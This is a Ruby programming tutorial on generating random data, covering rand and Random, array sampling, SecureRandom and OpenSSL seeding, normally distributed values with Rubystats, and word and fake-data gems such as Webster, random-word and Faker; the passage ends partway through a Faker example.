For more information on the Formattable interface, see the documentation for the interface. | http://java.sun.com/mailers/techtips/corejava/2007/tt0507.html | crawl-001 | refinedweb | 1,749 | 57.47 |
ArcGIS Runtime SDK for iOS provides an Objective-C API for developers that allows you to add mapping and GIS functionality to your iPhone, iPod touch, and iPad applications. The API leverages functionality provided by ArcGIS Server services through the REST interface. The API primarily provides a map component and tasks. The map component displays map content from layers or webmaps which in turn rely on backing Tiled or Dynamic map services. You can also add Graphics on the map to display your own points or areas of interest. Tasks provide functionality such as identifying features on a map, querying features given some criteria, geocoding and reverse geocoding addresses, running geoprocessing jobs, performing network analysis such as routing, etc.
The API is distributed as a framework called ArcGIS. This framework is installed by default under ${HOME}/Library/SDKs/ArcGIS. Classes and functions defined in this framework begin with the prefix AGS. This prefix acts as a namespace and prevents naming conflicts with classes defined in your application or other frameworks you use.
You need to use a minimum of iOS 4 SDK to build your applications. Be sure to set your XCode project's Base SDK setting accordingly.
The API depends upon the following iOS frameworks and libraries. These need to be added to your XCode project as references -
You need to set the project's Frameworks Search Paths setting to include ${HOME}/Library/SDKs/ArcGIS , and the Other Linker Flags setting to include the following entries: -ObjC -all_load -framework ArcGIS
You must also add the ArcGIS.bundle file found under ${HOME}/Library/SDKs/ArcGIS/ArcGIS.framework/Versions/Current/Resources to your project. This bundle file contains the resources (images, etc) used by the API.
The ArcGIS library depends upon and already includes the following third party libraries -
The functions/classes in these libaries have been renamed/namespaced to avoid conflicts with other versions of these libraries you may have in your project. | http://help.arcgis.com/en/arcgismobile/10.0/apis/iOS/2.2/apiref/main.html | CC-MAIN-2013-20 | refinedweb | 323 | 54.42 |
Select a language
Red Hat blog
Blog menu.
Containers and Virtualization
One of the over-arching themes I noticed at the Forum, was how developers can make virtualization more attractive for users who are considering containers as a fundamental layer of abstraction. Developers are intrigued with the possibility of deploying infrastructure in minutes rather than weeks. Containers also allow developers to define the infrastructure needed for their applications and ensure that each time their application is deployed it gets the same resources no matter the environment. Containers do not provide the same level of isolation as virtual machines. A VM has an entire operating system to itself that believes it’s installed on it’s own (virtual) hardware. It must share resources with the other VMs running on the same host, but the hypervisor proxies access to physical resources. A container has only the binaries and libraries defined as required available to it, and runs on the same (Linux) kernel as other containers. The kernel proxies access to physical resources like it does any other user mode process. Cgroups and namespaces provides isolation. For environments where high security or guaranteed performance is required, this is not a sufficient level of isolation.
Speed of deployment is one of the main drivers for adoption of containers. Because of the light level of isolation, containers can be deployed very quickly. Rather than provisioning an entire virtual server and installing an operating system, when deploying a container we need only define the container parameters and download any libraries we might be missing. KVM developers want to help users enjoy the benefits of both technologies by making VM deployments as speedy as containers. That means we want to pre-empt as much as possible so a responsive Operating System is available as soon as possible after provisioning.
I/O Performance
By far, the bulk of the conversation about KVM development in 2016/2017 was about improving I/O performance. As I mentioned, I’m new to Red Hat but not new to virtualization. I find a lot of my conversations about virtualization with customers inevitably lead to a discussion of I/O performance. There are a few different tracks of development related to I/O performance. KVM-rt is the KVM Realtime work. Some notable sessions that addressed this topic include:
- Real Time KVM by Red Hat’s Rik van Riel. Rik goes into some detail around the challenges of realtime in the context of KVM virtualization.
- Alex Williamson’s presentation on PCI Device Assignment with VFIO was awesome. His GitHub presentation gets into even more detail. He spends a good deal of time explaining how VFIO works, starting at basic device assignment and building up to VFIO. I’ve seen benchmark results from VFIO testing and have worked with some customers testing out VFIO. As we see more implementations of KVM for applications like NFVI, I expect we will need to take advantage of VFIO to supply direct device access to Virtual Machines in a safe way.
- Wei Wang from Intel’s presentation proposed a new way of communication between VMs - Vhost-pci. His testing was an interesting experiment in inter-VM connectivity. He is working to speed up communication between VMs, focused on the NFVI. VNFs can be sensitive to latency, and his approach could possibly improve performance by shortening the path from VM to VM. There was a great deal of feedback from the developers in attendance. You can find more details about the proposal from the qemu-devel mailing list.
- The conversation around virtualizing GPUs continues to get more interesting. Neo Jia and Kirti Wankhede presented Nvidia’s recommended approach to a mediated I/O device framework. This framework is VFIO based and built to allow virtualization of devices without SR-IOV. The framework would allow for a full discovery of virtual devices and allow for full lifecycle management because the device becomes virtual! The duo from Nvidia detailed their approach to the problem and demonstrated a functional environment leveraging an Nvidia Tesla M60. Virtual devices were created, then passed to QEMU as vfio-pci devices.
Continuing Security Efforts
Security is a theme woven into the fabric of the KVM project.
Jun Nakajima presented the results of an Intel PoC to secure the kernel in virtualized environment. The focus of the conversation was hardening the VMM (Virtual Machine Manager or hypervisor) to ensure guest VMs are isolated from the host kernel even more than in today’s standard KVM deployment. The Intel team is also testing enhancements to the VMM that could be offloaded to hardware. Fascinating work, you can find the deck here.
Steve Rutherford from Google walked through his team’s approach to hardening virtualization hosts while preserving performance. Their focus is on reducing the attack surface available to guest VMs. Moving more KVM code to Userspace helps, but risks an impact to performance. His presentation dives into how they’ve approached the balance between performance and security. Steve and team spent a good deal of time testing performance and shared these results with the group. You can find these results in the linked presentation.
AMD is looking at ways to secure access to memory. Thomas Lendacky presented their approach: Secure Encrypted Virtualization”. They suggest offloading inline memory encryption and encryption key management to on-die engines they have built. It’s an interesting approach to isolate VMs and containers from each other, as well as isolating the workloads from the underlying hypervisor. AMD is still developing the firmware (proprietary), Linux drivers, kernel support and KVM/QEMU support.
The Future of KVM
A number of sessions throughout the 3-day forum were focused on where KVM is going. For a community driven project like KVM, the roadmap isn’t just about features and bug fixes, it’s also about how the community can work together better. How can we be more efficient communicating, reviewing and accepting patches?
A good introduction to the topic is the panel discussion with some key figures in KVM development. Daniel Berrange and Paolo Bonzini from Red Hat, Andrew Honig from Google, and Den Lunev from Virtuozzo had a conversation about where KVM has been, and where it’s going in future as they reviewed pre-canned questions and addressed questions from the collected development team.
Stefan Hajnoczi spoke in detail about how Open Source Internships can help the QEMU Community Grow in his presentation. The QEMU project has participated in the Google Summer of Code since 2010, and in 2014 also began working with Outreachy. Stefan went on to outline how these programs have benefited the community and some guidelines for other projects considering participating in similar mentoring programs.
Lessons Learned
The KVM developer community is very accepting. Perhaps a few folks reading will chuckle at that statement. I’m sure submitting patches can be frustrating at times as with any large project. But in my short experience interacting with folks, everyone was quick to share information and were very open to explaining development concepts to a server guy.
The only accurate documentation in a project like KVM is the code. I’ve since gone back to the C programming language, refreshing my development skills so I can better understand what’s happening. When looking for details about the new developments in KVM, the best place to go to, is the code. The beautiful thing about KVM as a virtualization platform is that everything is out in the open. That provides users with some powerful abilities in terms of understanding performance, troubleshooting issues.
There continues to be a vibrant community focused on virtualization. There are of course some very large organizations contributing to KVM, but the lion’s share of code comes from independent developers. That makes for a lively community producing great code!
This was a sampling of the themes and amazing presentations from the 2016 KVM Forum. You can find the entire agenda here and see many more sessions! | https://www.redhat.com/en/blog/notes-field-summary-kvm-forum | CC-MAIN-2020-40 | refinedweb | 1,327 | 54.73 |
Human beings can be utterly perplexing sometimes.
After all, our species have this (not so) amazing talent to form a totally uninformed opinion on just about everything. Regardless of whether we know anything about the things that we have become so determined to either a) like, or b) dislike.
# BEGIN: Deeply philosophical interlude.
What's more, once opinions have been assigned to the mysterious (and somewhat immutable) data structures defined deep in our (mostly cranial) cavities, they are near-impossible to alter. It simply becomes a part of us. Tragically, we know all too well, that this starts to impact our ability to assess facts impartially, especially if they go against our deep-seated views. And inevitably, this prevents us from making rational, cool-headed decisions on critically important issues. To top it all off, we like to voice our opinions loudly. Over. And. Over. Again. To whomever that listens.
# END: Deeply philosophical interlude. Return to normal garbage.
So based on our extremely scientific 15-second study of human psychology, we've finally decided to equip Rosie Patrol with much-hyped about FI or Fartificial Intelligence (commonly known in not-so renowned academic circles as farcical intelligence akin to neurological flatulence).
And why would a superhero robot like Rosie Patrol require this? It's because guardians of the
All in all, it is our hope that this much needed downgrade will allow Rosie Patrol to closely mimic the "best" of human behaviour. Such as:
- Instantly offering a completely unfounded opinion on something that we see, even though no-one asked (and no-one actually cares). Fight wars based on these opinions, if you've got nothing better to be doing.
- Only changing those opinions if we absolutely have to. Actually, let's not. It's just easier to live with them. Forever. Than admit that you're wrong.
- Go on and on (and on) about the things that we just happen to have an opinion on - at the expense of infinitely more important matters. Bizarrely, some people might even like hearing you go on and on (and on) about them... thereby creating an infinite loop of never-ending stupidity.
Happy? Roll on Project FI!
All superheroes need:
- We're still operating 2 Raspberry Pi 3s here, both running Raspbian OS: rosie-01 and rosie-02. Connected to each other over Wi-Fi, and to the Internet. You'll notice that we're using the API endpoints we created previously using Flask to remotely control various parts of Rosie, like her motors, lights and eyes. Yes, it's completely unnecessary.
- No new gadgets are strictly required here. However, it doesn't mean we've disposed of any of the old ones. Nope, Rosie Patrol is still very much equipped to her eyeballs with random gadgetry, such as:
- Relay-controlled head torch... why not? It's so this season.
- Dot LED matrix displays... for Rosie Patrol's expressive eyes. After all, farcical opinions seem a lot more legitimate when they are accompanied by distracting lighting.
- Raspberry Pi Camera Module V2... quite important this one, actually.
- Speaker... you'll need this to hear Rosie Patrol's inner thoughts.
- Servo motors and controller... make Rosie Patrol's neck move (yes, it's completely over the top).
- DC motor controller board and wheels... would you really prefer to carry a robot around instead?
Already completed these missions?
- Lights in shining armour
- I'm just angling around
- Eye would like to have some I's
- Eh, P.I?
- Lights, camera, satisfaction
- Beam me up, Rosie!
- a, b, see, d
- Code: read
Your mission, should you accept it, is to:
- Modify our Python REST API destined to Google Cloud Vision API to carry out label detection, instead of text detection (OCR). It will literally take less time to change this than it just took to read this sentence.
- Write some Python code to process the labels (objects) that are detected by, and returned from Google Cloud Vision API
- Forget all you know about intelligence, and implement something significantly subpar. Create Python code to form random opinions, irritatingly voice them (over and over again) and introduce suspiciously human-like bias.
- Pilot her around space (no, not that one) filled with highly thought-provoking test objects, and listen to her sound like Marvin out of The Hitchhiker's Guide to the Galaxy
The brief:The basic principles behind this experiment were actually put together during our little (and surprisingly popular!) detour to get Rosie to play Countdown. In it, we discovered that we could:
- Take photos of the environment using Raspberry Pi Camera Module V2. Specifically, of the TV screen showing Countdown.
- Send photos to Google Cloud Vision API using Python's Requests module, to perform Optical Character Recognition (OCR)
- Do some Python stuff, using a pre-complied dictionary, with the detected text to solve Countdown's letters round. This bit is totally redundant for this experiment.
- Use Python gTTS to produce a mp3 file of robot saying the top scoring answer
- Play it back to humans, using omxplayer
To this end, we could train our very own machine learning Classification algorithm; that is, a program that attempts to categorise a bunch of similar data (in our case, camera images) into pre-defined labels (for example, names or descriptions of objects), according to certain attributes present in the data. We'd feed it lots of images to train our algorithm, and measure its accuracy using test images. The problem is, we'd probably spend months on end feeding our program pictures of things that we find around the house, and tuning the algorithm to ensure it is correctly detecting the objects in them. It also involves you actually having to know some pretty clever stuff (like maths), and possibly the use of some more powerful computers, to develop anything remotely usable. Unless you're planning to be an expert in Machine Learning*, it's probably not the best use of your precious time.
*Probably not a bad idea, since most jobs will soon be held by robots anyway (...apparently)
...That's why we'll be returning to using Google Cloud Vision API, specifically its label detection feature, to do all this clever stuff for us.
Here is a clearly scientific (and somewhat unintentionally encrypted) blueprint for this highly sophisticated experiment.
Accompanied by somewhat less cryptic text:
And oh yes, we'll be once again controlling Rosie Patrol's movements around a
Information overload:We previously used Google Cloud Vision API to perform Optical Character Recognition (OCR). We'll now use it for recognising objects.
Thankfully, as the documentation makes clear, this task is actually as trivial as changing a JSON value of type to LABEL_DETECTION. Send this to Google Cloud Vision API in a REST API POST request, along with the base-64 encoded image taken by the Pi Camera, using the Python Requests module. And that's about it for the label detection phase of Project FI.
def _construct_google_vision_json(image=None): data = { "requests": [ { "image": { "content": "" }, "features": [ { "type": "LABEL_DETECTION" } ] } ] } data["requests"][0]["image"]["content"] = _encode_image(image) return data
There's a slight difference in how we handle the response, however. Unlike before with text detection, the JSON response back from the Google mothership consists of multiple potential objects that have been detected in the image, along with a confidence score. This means we now need to look through multiple "labelAnnotations" records stored in the JSON response.
Something like this will allow us to store the multiple objects in a list.
def _find_objects_in_image(image=None, url=None, token=None): if not path.exists(image): print("File", image, "does not exist") sys.exit() r_request = _post_json_request(url+token, _construct_google_vision_json(image)) if r_request.status_code == 200: if r_request.json()["responses"][0]: return r_request.json()["responses"][0]["labelAnnotations"] else: print("HTTP error encountered", r_request.status_code)
Clearly, none of this is meaningful, unless we run it after taking a photo using Pi Camera. Out comes our function we used before, now with the ability to archive the photos being taken (so that we can inspect them later, rather than being overwritten).
def _detect_object(camera): camera.capture(SOURCE_IMAGE) discovered = _find_objects_in_image(SOURCE_IMAGE, GOOGLE_VISION_API, GOOGLE_VISION_TOKEN) copyfile( SOURCE_IMAGE, ARCHIVE_IMAGE+datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")+".jpg" ) return discovered
If everything is working correctly, we should be able to do something like this to look through the list of objects (described in dictionaries) that have been detected. This particular implementation will allow us to pick the object with the highest confidence score. And send it to our _form_random_opinions() function for processing by the core code underpinning the hyper-intelligence of Project FI. In our actual code (right at bottom of post), we actually implemented some bias here for Rosie Patrol to favour objects that she has already formed an opinion on (more on this in a minute).
discovered_objects = _detect_object(cam1) if discovered_objects is not None: best_match = {} best_score = 0 for discovered_object in discovered_objects: if discovered_object["score"] > best_score: best_match = discovered_object speech = _form_random_opinions(best_match["description"])
Now, we realise that we kept promising you the stupidification of robot intelligence on a grand scale. And everything so far seems boringly sensible. And worryingly, quite useful.
Here's a completely unrelated before photo of Rosie Patrol, prior to being subjected to human interference. She is quite clearly very sophisticated.
Back to our mission.
That's right: _form_random_opinions() is precisely where we are attempting to scientifically mimic human behaviour. No expense has been spared in developing this advanced military-grade algorithm. It puts the F back into FI. Yes, we're doing well. We're cooking on gas.
The function revolves around 2 lists:
rosie_likes = [] rosie_dislikes = []
Not unlike humans, we'll get Rosie Patrol to maintain running lists of things that she likes, and dislikes.
And _form_random_opinions() helps to do these things as objects (new and old) are detected.
- If it's an object that's already in Rosie Patrol's rosie_likes list, we'll randomly construct a positive sentence based on some stock 'like' responses stored in a list of tuples: rosie_likes_preambles
- Similarly, if it's an object that's already in her rosie_dislikes list, we'll randomly construct a negative sentence based on some stock 'dislike' responses stored in a list of tuples: rosie_dislikes_preambles
- If it's an entirely new object, we'll randomly like or dislike it, and store the result in one of our 2 lists. Remember; Rosie Patrol will never change her mind (although stopping the Python application clears her memory, quite literally).
rosie_likes_preambles = [ ("My computer brain goes all fuzzy when I see", "I just love it!"), ("Life is so much better when", "is there."), ("Beautiful. Just beautiful.", "is a work of art."), ("Yes! I couldn't possibly imagine life without", ""), ("Dear ", "I think I'm in love with you.") ]
...And this is _form_random_opinions():
def _form_random_opinions(discovered_object): global rosie_likes global rosie_dislikes if discovered_object in rosie_likes: selection = randint(0, len(rosie_dislikes_preambles)-1) speech = ( rosie_likes_preambles[selection][0] + " " + discovered_object + " " + rosie_likes_preambles[selection][1] ) _post_rosie_json_request(API_EYES_URL, "expression", "happy") _post_rosie_json_request(API_LIGHTS_URL, "light", 1) elif discovered_object in rosie_dislikes: selection = randint(0, len(rosie_dislikes_preambles)-1) speech = ( rosie_dislikes_preambles[selection][0] + " " + discovered_object + " " + rosie_dislikes_preambles[selection][1] ) _post_rosie_json_request(API_EYES_URL, "expression", "broken") _post_rosie_json_request(API_CONTROL_URL, "control", "stop") _post_rosie_json_request(API_LIGHTS_URL, "light", 3) else: like_or_dislike = randint(0, 1) if like_or_dislike == 0: rosie_likes.append(discovered_object) speech =\ "I've randomly decided that I like " + discovered_object _post_rosie_json_request(API_EYES_URL, "expression", "happy") _post_rosie_json_request(API_LIGHTS_URL, "light", 1) elif like_or_dislike == 1: rosie_dislikes.append(discovered_object) speech =\ "I've made up my mind. I don't like " + discovered_object _post_rosie_json_request(API_EYES_URL, "expression", "broken") _post_rosie_json_request(API_LIGHTS_URL, "light", 3) return speech
You might have noticed a few API requests thrown in for added excitement. Clearly, we want Rosie Patrol to perform a few other things as she notifies us of her inner thoughts, like change her eyes, lights and even to stop her movement (if she's moving at the time).
The speech - constructed in mp3 format using gTTS - is played back through speakers using omxplayer, just like before.
Now, if you're still reading this, it's probably because you desperately wanted to ensure that we delivered on the promise of meaningless robot sound effects. Here it is, sandwiching our object detection routine. It's been put into a thread, so that sound effects play in the background while the detection is taking place. Furthermore, we won't continue with the rest of the program - enforced using .join() - until the sound effects have stopped playing, forcing you to sit through all of its majestic noise.
t_soundfx = Thread(target=_play_sound, args=(SFX_PROCESSING,)) t_soundfx.daemon = True t_soundfx.start() _post_rosie_json_request(API_LIGHTS_URL, "light", 4) discovered_objects = _detect_object(cam1) t_soundfx.join()
This particular jingle was obtained from ZapSlat which appears to be a free, downloadable repository of sound effects.
The moment of (not so true) truth:
This is it. The grand unveiling of Project FI. You can now pilot Rosie Patrol around the chosen terrain - hopefully populated by lots of
...And you'll soon know just how strongly she feels about the things she's encountered before (flooring in particular is on the wrong end of a pretty vicious verbal tirade), when such things drift into her range over and over again...
And wholly for our amusement, and unlike with our brains, her likes and dislikes are far from concealed, and available for all of us to see in the rosie_likes and rosie_dislikes lists in real-time. Now, only if we could do that with real people... Oh, forgot. That's what Twitter is for?
Below is a picture of our highly professional testing ground, equipped with the most technologically advanced test objects, modelled on items that autonomous robots are highly likely to encounter during their top secret missions to defeat world evil. Yes, that is a guitar, toy pushchair, baby (note: not real), and a unicorn (note: not real either) amongst several other entities to frivolously form an opinion on.
Don't forget to set your API key in the Linux environment variable.
export ROSIE_GOOGLE_API_TOKEN='your_secret_key...'
Also, don't forget to monitor your Google Cloud Vision API usage. Depending on how frequently you are sending your API request, you might near or pass your quota.
Let's fire up our application and see what Rosie Patrol learns to like and dislike over time.
python3 random_opinions.py
...And the results are (fairly) amusing.
Clearly, the outcome is highly dependent on the quality of the photos, and how accurately Google Cloud Vision API is able to label the objects detected in them. Also, the code is missing any form of context when interpreting the objects. For example, is there likely to be a real unicorn marauding through a
Interestingly, in this particular setting, flooring becomes a recurring theme in every single photo taken. And our little Python fix to make Rosie Patrol prioritise her attentions on the things that she has already seen before becomes prominent (and rather very annoying). Despite unicorns and cute little puppies seeking her attention, she becomes dangerously obsessed by the evils of flooring as she has already formed an opinion on it, and because it keeps making an appearance in the photos. She's quite clearly pandering to an audience... an audience that simply cannot tolerate flooring.
That's not all.
Rosie objects to bottles.
...And she does not like guitars.
Here are the list of likes and dislikes compiled during one run.
And here's another.
At this point, we could put Rosie Patrol into 'auto' mode for several hours, and see what she learns to like and dislike over that time. That way, we really could prove if FI is the answer to all of world's problems.
Then again, it most probably isn't. It stinks. And that's probably why thousands of very clever boffins around the world continue to work on another (arguably more respected and legitimate) field of science: Artificial Intelligence (AI). And for this reason, for now, we'll bottle the F in FI away, and let the world return to worrying about the state of intelligence, in general.
By the way the entire code can be found here if you too are thinking about ejecting one out: | https://www.rosietheredrobot.com/2017/12/farcical-fartificial-intelligence.html | CC-MAIN-2018-09 | refinedweb | 2,677 | 54.93 |
You pay $0.20 per hour for each Amazon EKS cluster that you create. You can use a single Amazon EKS cluster to run multiple applications by taking advantage of Kubernetes namespaces and IAM security policies.
You pay for AWS resources (e.g. EC2 instances or EBS volumes) you create to run your Kubernetes worker nodes. You only pay for what you use, as you use it; there are no minimum fees and no upfront commitments.
See detailed pricing information on the Amazon EC2 pricing page.
Additional pricing resources
TCO Calculator
Calculate your total cost of ownership (TCO)
Simple Monthly Calculator
Easily calculate your monthly costs with AWS
Economics Resource Center
Additional resources for switching to AWS
Learn how to get started with Amazon EKS
Ready to build?Get started with Amazon EKS
Have more questions?Contact us | https://aws.amazon.com/eks/pricing/ | CC-MAIN-2018-43 | refinedweb | 138 | 56.35 |
A Tour Through Random Ruby
This article covers various ways that you can generate random (usually pseudo-random) information with Ruby. Random information can be useful for a variety of things, in particular testing, content generation, and security. I used Ruby 2.0.0, but 1.9 should produce the same results.
Kernel#rand and Random
In the past, a random range of numbers might be described like
rand(max - min) + min
For example, if you wanted to generate a number between 7 and 10, inclusive, you would write:
rand(4) + 7
Ruby lets you do this in a much more readable manner by passing a Range object to Kernel#rand.
>> rand(7..10) => 9 >> rand(1.5..2.8) => 1.67699693779624
Kernel#srand sets the seed for Kernel#rand. This can be used to generate a reproducible sequence of numbers. This might be handy if you are trying to isolate / reproduce a bug.
>> srand(333) >> 10.times.map { rand(10) } => [3, 3, 6, 3, 7, 7, 6, 4, 4, 9] >> 10.times.map { rand(10) } => [7, 5, 5, 8, 8, 7, 3, 3, 3, 9] >> srand(333) >> 10.times.map { rand(10) } => [3, 3, 6, 3, 7, 7, 6, 4, 4, 9] >> 10.times.map { rand(10) } => [7, 5, 5, 8, 8, 7, 3, 3, 3, 9]
If you need multiple generators, then you can access the complete interface to Ruby’s PRNG (Pseudo-Random Number Generator) through Random.
>> rng = Random.new >> rng.rand(10) => 4
Random#new can take a seed value as an argument. The #== operator will return true if two Random objects have the same internal state (they started with the same seed and are on the same generation).
>> rng1 = Random.new(123) >> rng2 = Random.new(123) >> rng1 == rng2 => true >> rng1.rand => 0.6964691855978616 >> rng1 == rng2 => false >> rng2.rand >> 0.6964691855978616 >> rng1 == rng2 => true
Random Array Elements
If you wanted a random element from an Array, you could pass pass the Array a random index like this:
>> arr = [1, 2, 3, 4, 5] >> arr[rand(arr.size)] => 1
This isn’t necessary. As of Ruby 1.9, you can use Array#sample. It was previously known as Array#choice.
>> [1, 2, 3, 4, 5].sample => 4
Two consecutive #sample calls are not guaranteed to be different. You can pass the number of unique random elements you want to #sample.
>> [1, 2, 3, 4, 5].sample(2) => [4, 1]
Since #sample is only available for Array, for other collections you will need to either do it the old-fashioned way or convert them to Array first.
Actually Random Numbers
Sometimes pseudo-random numbers are not good enough. If they are based on something predictable, they can be predicted and exploited by an attacker.
RealRand is a wrapper for 3 genuine random number generator services:
- random.org: generates randomness from atmospheric noise
- FourmiLab(HotBits): uses radioactive decay
- random.hd.org(EntropyPool): claims to use a variety of sources, including local processes / files / devices, web page hits, and remote web sites.
Note: As of this writing, the RealRand homepage appears to contain examples for 1.x, where RealRand’s classes are grouped under the Random module. The newest version of the gem (2.0.0) groups the classes under the RealRand module, as in these examples.
$ gem install realrand >> require 'random/online' >> rorg = RealRand::RandomOrg.new >> rorg.randbyte(5) => [197, 4, 205, 175, 84] >> fourmi = RealRand::FourmiLab.new >> fourmi.randbyte(5) => [10, 152, 184, 66, 190] >> entropy = RealRand::EntropyPool.new >> entropy.randbyte(5) => [161, 98, 196, 75, 115]
In the case of the RandomOrg class, you also have the #randnum method which will let you specify a range in addition to the number of random numbers.
>> rorg.randnum(5) => [94, 3, 94, 56, 97] >> rorg.randnum(10, 3, 7) => [7, 7, 7, 5, 7, 4, 4, 5, 6, 7]
Random Security
Ruby ships with SecureRandom for generating things like UUIDs (Universally Unique Identifiers), session tokens, etc.
>> require 'securerandom' >> SecureRandom.hex => "e551a47137a554bb08ba36de34659f60" >> SecureRandom.base64 => "trwolEFZYO7sFeaI+uWrJg==" >> SecureRandom.random_bytes => "\x10C\x86\x02:\x8C~\xB3\xE0\xEB\xB3\xE7\xD1\x12\xBDw" >> SecureRandom.random_number => 0.7432012014930834
“Secure” probably depends on who you are. SecureRandom uses the following random number generators:
- openssl
- /dev/urandom
- Win32
A glance at the code reveals that it defaults to
OpenSSL::Random#random_bytes. It looks like PIDs and process clock times (nanosecond) are used for entropy whenever the PID changes.
I suspect that this is enough for most things, but if you need an extra layer of protection, you could use RealRand for additional entropy. Unfortunately, SecureRandom does not have anything like a
#seed method, so you will need to seed OpenSSL directly. Note: OpenSSL seeds are strings.
>> require 'openssl' >> require 'random/online' >> rng = RealRand::RandomOrg.new >> OpenSSL::Random.random_add(rng.randbyte(256).join, 0.0)
You can read why I used 0.0 here. According to the patch discussion, the 0.0 as the second argument to
#random_add is the amount of estimated entropy. Previously, it was being overestimated, so the number was changed to 0.0. However, According to the OpenSSL documentation the 2nd argument to
RAND_add is the number of bytes to be mixed into the PRNG state, and the 3rd argument is the estimated amount of entropy.
OpenSSL::Random#random_add does only take 2 arguments (instead of 3), but if they got the 2nd argument wrong and 0 bytes of seed are getting mixed in, then SecureRandom is probably worthless for anything serious without a fix. If you know anything about this, please leave a comment.
Random Numbers Based on Probability Distributions
Let’s say you wanted to generate random, yet realistic, human masses (i.e. weights for non-égalité imperials). A naive attempt might look like this:
>> 10.times.map { rand(50..130) } => [92, 84, 77, 55, 95, 127, 120, 71, 105, 94]
Now, although you could find human beings that are 50 kilograms (110 lbs), and you could find some that are 130 kilograms (286 lbs), most are not quite that extreme, making the above result unlikely for a completely random sample (not mostly members of McDonald’s Anonymous and professional wrestlers).
One option is to just ignore the extreme ranges:
>> 10.times.map { rand(55..85) } => [58, 80, 55, 65, 58, 70, 71, 82, 79, 60]
The numbers that would generally be obtained are a little better now, but they still don’t approximate reality. You need a way to have the majority of the random numbers fall within a smaller range, while a smaller percentage fit within a much larger range.
What you need is a probability distribution.
Alas, Ruby is not strong in the math department. Most of the statistics solutions I came across were copy/paste algorithms, unmaintained libraries/bindings with little documentation, and hacks that tap into math environments like R. They also tended to assume an uncomfortably deep knowledge of statistics (okay maybe like one semester, but I still should not have to go back to college to generate random numbers based on a probability distribution).
This document claims that human traits like weight and height are normally distributed. Actually, quite a few things show up in normal distributions.
Rubystats is one of the simpler libraries I encountered. It can generate random numbers from normal, binomial, beta, and exponential distributions.
For this example I used a normal distribution with a mean mass of 68 kg and a standard deviation of 12 kg (just guesses, not to be taken as science).
$ gem install rubystats >> require 'rubystats' >> human_mass_generator = Rubystats::NormalDistribution.new(68, 12) >> human_masses = 50.times.map { human_mass_generator.rng.round(1) } => [62.6, 75.4, 62.1, 66.2, 50.9, 58.9, 70.8, 51.4, 60.9, 63.5, 72.0, 48.2, 62.3, 63.0, 75.3, 62.6, 103.0, 62.3, 46.6, 66.2, 62.7, 92.2, 76.1, 85.1, 77.5, 75.9, 57.1, 68.3, 63.8, 53.3, 51.6, 75.4, 61.9, 67.7, 58.2, 64.2, 83.3, 69.0, 75.5, 68.8, 60.4, 83.8, 76.2, 81.0, 60.9, 61.2, 55.5, 53.1, 61.4, 79.0]
There are 2.2 American pounds in a kilogram, for those of you to whom these numbers mean little.
>> human_weights = human_masses.map { |i| (i * 2.2).round(1) } => [137.7, 165.9, 136.6, 145.6, 112.0, 129.6, 155.8, 113.1, 134.0, 139.7, 158.4, 106.0, 137.1, 138.6, 165.7, 137.7, 226.6, 137.1, 102.5, 145.6, 137.9, 202.8, 167.4, 187.2, 170.5, 167.0, 125.6, 150.3, 140.4, 117.3, 113.5, 165.9, 136.2, 148.9, 128.0, 141.2, 183.3, 151.8, 166.1, 151.4, 132.9, 184.4, 167.6, 178.2, 134.0, 134.6, 122.1, 116.8, 135.1, 173.8]
If this is up your alley, you might also want to check out gsl, distribution, and statistics2
Random Strings
There is a good page on stackoverflow which has several solutions for generating random strings. I liked these:
>> (0...8).map { (65 + rand(26)).chr }.join => "FWCZOUOR" >> (0...50).map{ ('a'..'z').to_a[rand(26)] }.join => ygctkhpzxkbqggvxgmocyhvbocouylzfitujyyvqhzunvgpnqb
Webster
Webster is an English / English-sounding word generator. It could be useful for generating confirmation codes in western localizations.
$ gem install webster >> require 'webster' >> w = Webster.new >> w.random_word => "unavailed" >> 20.times.map { w.random_word } => ["bombo", "stellated", "kitthoge", "starwort", "poleax", "lacinia", "crusty", "hazelly", "liber", "servilize", "alternate", "cembalist", "dottore", "ullage", "tusculan", "tattlery", "ironness", "grounder", "augurship", "dupedom"]
random-word
The random-word gem claims to use the massive wordnet dictionary for its methods. You ever had somebody accuse you of using “them big words?” Those are the kinds of words that random-words appears to produce.
$ gem install random-word >> require 'random-word' >> 10.times.map { RandomWord.adjs.next } => ["orthographic", "armenian", "nongranular", "ungetatable", "magnified", "azimuthal", "geosynchronous", "platitudinous", "deep_in_thought", "substitutable"] >> 10.times.map { RandomWord.nouns.next } => ["roy_wilkins", "vascular_tissue", "bygone", "vermiform_process", "anamnestic_reaction", "engagement", "soda_niter", "humber", "fire_salamander", "pyridoxamine"] >> 10.times.map { RandomWord.phrases.next } => ["introvertive glenoid_cavity", "sugarless reshipment", "anticipant cyclotron", "unheaded ligustrum_amurense", "dauntless contemplativeness", "nativistic chablis", "scapular typhoid_fever", "warlike dead_drop", "pyrotechnic varicocele", "avionic cyanite"]
If you want to get rid of those underscores, just add a gsub:
>> 10.times.map { RandomWord.nouns.next.gsub('_', ' ') } => ["litterbug", "nebe", "business sector", "stochastic process", "playmaker", "esthesia", "granny knot", "purple osier", "sterculia family", "ant cow"]
Faker
Faker is useful for generating testing data. It has rather large library of data, so you might be able to generate procedural game content as well.
$ gem install faker >> require 'faker' >> 20.times.map { Faker::Name.name } => ["Gilberto Moen", "Miss Caleb Emard", "Julie Daugherty", "Katelin Rau", "Sheridan Mueller", "Cordell Steuber", "Sherwood Barrows", "Alysson Lind II", "Kareem Toy", "Allison Connelly", "Orin Nolan", "Dolores Kessler", "Kassandra Hackett Jr.", "Mikayla Spencer II", "Lonie Kertzmann", "Emile Walsh V", "Tara Emmerich", "Mrs. Beryl Keeling", "Jerry Nolan DVM", "Linnie Thompson"] >> 10.times.map { Faker::Internet.email } => ["catherine.schamberger@toy.net", "eleonore@heaney.net", "toni@colliermoore.org", "merl_miller@pfeffer.net", "florine_dach@gusikowski.net", "bernadine@walter.net", "stevie.farrell@crooks.net", "janick@satterfield.name", "leanna.lubowitz@bogisich.biz", "rey@kutch.info"] >> 10.times.map { Faker::Address.street_address } => ["3102 Jasen Haven", "8748 Huel Parks", "1886 Gutkowski Creek", "837 Jennie Spurs", "4921 Carter Coves", "7714 Ida Falls", "8227 Sawayn Bypass", "269 Kristopher Village", "31185 Santos Inlet", "96861 Heaney Street"] >> 10.times.map { Faker::Company.bs } => ["aggregate extensible markets", "repurpose leading-edge metrics", "synergize global channels", "whiteboard virtual platforms", "orchestrate ubiquitous relationships", "enable interactive e-services", "engineer end-to-end convergence", "deploy enterprise e-services", "benchmark wireless 